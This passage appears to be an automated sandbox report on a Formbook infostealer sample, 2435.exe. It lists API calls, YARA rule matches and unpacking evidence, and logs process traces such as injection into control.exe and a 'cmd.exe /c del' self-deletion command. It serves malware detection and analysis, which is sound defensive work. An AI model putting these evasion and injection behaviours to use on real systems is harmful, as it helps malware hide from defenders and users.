          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AB9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AB99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AB9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AB9A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AB9A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AB9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AB95D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AB9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AB96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AB9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AB97A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AB9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AB9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AB98A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AB9820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00ABB040 NtSuspendThread,
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AB99D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AB9950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AB9A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AB9A10 NtQuerySection,
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00ABA3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AB9B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AB95F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AB9520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00ABAD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AB9560 NtWriteFile,
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AB96D0 NtCreateKey,
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AB9610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AB9670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AB9650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AB9FE0 NtCreateMutant,
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AB9730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00ABA710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AB9760 NtOpenProcess,
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AB9770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00ABA770 NtOpenThread,
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_1_00419D60 NtCreateFile,
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_1_00419E10 NtReadFile,
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_1_00419E90 NtClose,
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_1_00419F40 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047795D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047796E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047796D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047799A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779560 NtWriteFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0477AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047795F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0477A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0477A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047797A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0477B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047798F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047798A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047799D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0477A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_02FC9E90 NtClose,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_02FC9E10 NtReadFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_02FC9F40 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_02FC9D60 NtCreateFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_02FC9E8A NtClose,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_02FC9E0A NtReadFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_02FC9F3A NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_02FC9D5A NtCreateFile,
          Source: C:\Users\user\Desktop\2435.exeCode function: 0_2_0040323C EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\2435.exeCode function: 0_2_00404853
          Source: C:\Users\user\Desktop\2435.exeCode function: 0_2_00406131
          Source: C:\Users\user\Desktop\2435.exeCode function: 0_2_73351A98
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00401030
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_0041E1FC
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_0041D260
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_0041DA2A
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_0041BDC4
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00402D90
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00409E40
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00409E3C
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_0041D6DF
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_0041DFA3
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00402FB0
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AA20A0
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B420A8
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A8B090
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B428EC
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B4E824
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A9A830
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B31002
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A999BF
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A94120
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A7F900
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B422AE
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B34AEF
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B2FA2B
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AAEBB0
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B223E3
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B3DBD2
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B303DA
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AAABD8
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B42B28
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A9A309
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A9AB40
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B34496
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A8841F
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B3D466
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AA2581
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B32D82
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A8D5E0
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B425DD
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A70D20
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B42D07
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B41D55
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B42EF7
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A96E30
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B3D616
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B41FF1
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B4DFCE
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_1_00401030
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_1_0041E1FC
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_1_0041D260
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_1_0041DA2A
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047FD466
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0474841F
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04730D20
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_048025DD
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04802D07
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0474D5E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04801D55
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04762581
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04756E30
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047FD616
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04802EF7
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0480DFCE
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04801FF1
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_048020A8
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0475A830
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_048028EC
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047F1002
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0480E824
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047620A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0474B090
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04754120
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0473F900
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047599BF
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_048022AE
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047EFA2B
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0475AB40
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0475A309
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047E23E3
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047F03DA
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04802B28
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047FDBD2
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0476ABD8
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0476EBB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_02FCE1FC
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_02FB9E40
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_02FB9E3C
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_02FB2FB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_02FCDFA3
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_02FCBDC4
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_02FB2D90
          Source: C:\Users\user\Desktop\2435.exeCode function: String function: 00A7B150 appears 133 times
          Source: C:\Windows\SysWOW64\control.exeCode function: String function: 0473B150 appears 90 times
          Source: 2435.exe, 00000000.00000003.228583086.0000000009C7F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 2435.exe
          Source: 2435.exe, 00000001.00000002.288731755.0000000000CFF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 2435.exe
          Source: 2435.exe, 00000001.00000002.288265327.00000000007E1000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameCONTROL.EXEj% vs 2435.exe
          Source: 2435.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.288063983.0000000000590000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.288063983.0000000000590000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.287887430.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.287887430.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.288110425.00000000005C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.288110425.00000000005C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.279389714.000000000705E000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.279389714.000000000705E000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.496354910.0000000000A80000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.496354910.0000000000A80000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.497155166.0000000002FB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.497155166.0000000002FB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000001.232707868.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.232707868.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.2435.exe.24d0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.2435.exe.24d0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.2435.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.2435.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.2435.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.2435.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.2435.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.2435.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.2435.exe.24d0000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.2435.exe.24d0000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.2435.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.2435.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/4@3/4
          Source: C:\Users\user\Desktop\2435.exeCode function: 0_2_00404356 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\user\Desktop\2435.exeCode function: 0_2_00402020 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6292:120:WilError_01
          Source: C:\Users\user\Desktop\2435.exeFile created: C:\Users\user\AppData\Local\Temp\nsq164.tmpJump to behavior
          Source: 2435.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\2435.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\2435.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: 2435.exeReversingLabs: Detection: 43%
          Source: C:\Users\user\Desktop\2435.exeFile read: C:\Users\user\Desktop\2435.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\2435.exe 'C:\Users\user\Desktop\2435.exe'
          Source: C:\Users\user\Desktop\2435.exeProcess created: C:\Users\user\Desktop\2435.exe 'C:\Users\user\Desktop\2435.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\2435.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\2435.exeProcess created: C:\Users\user\Desktop\2435.exe 'C:\Users\user\Desktop\2435.exe'
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\2435.exe'
          Source: C:\Users\user\Desktop\2435.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: Binary string: wntdll.pdbUGP source: 2435.exe, 00000000.00000003.228355721.0000000009B60000.00000004.00000001.sdmp, 2435.exe, 00000001.00000002.288517092.0000000000B6F000.00000040.00000001.sdmp, control.exe, 00000009.00000002.497622003.0000000004710000.00000040.00000001.sdmp
          Source: Binary string: control.pdb source: 2435.exe, 00000001.00000002.288197425.0000000000750000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: 2435.exe, control.exe
          Source: Binary string: control.pdbUGP source: 2435.exe, 00000001.00000002.288197425.0000000000750000.00000040.00000001.sdmp

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\2435.exeUnpacked PE file: 1.2.2435.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\2435.exeCode function: 0_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\Desktop\2435.exeCode function: 0_2_73352F60 push eax; ret
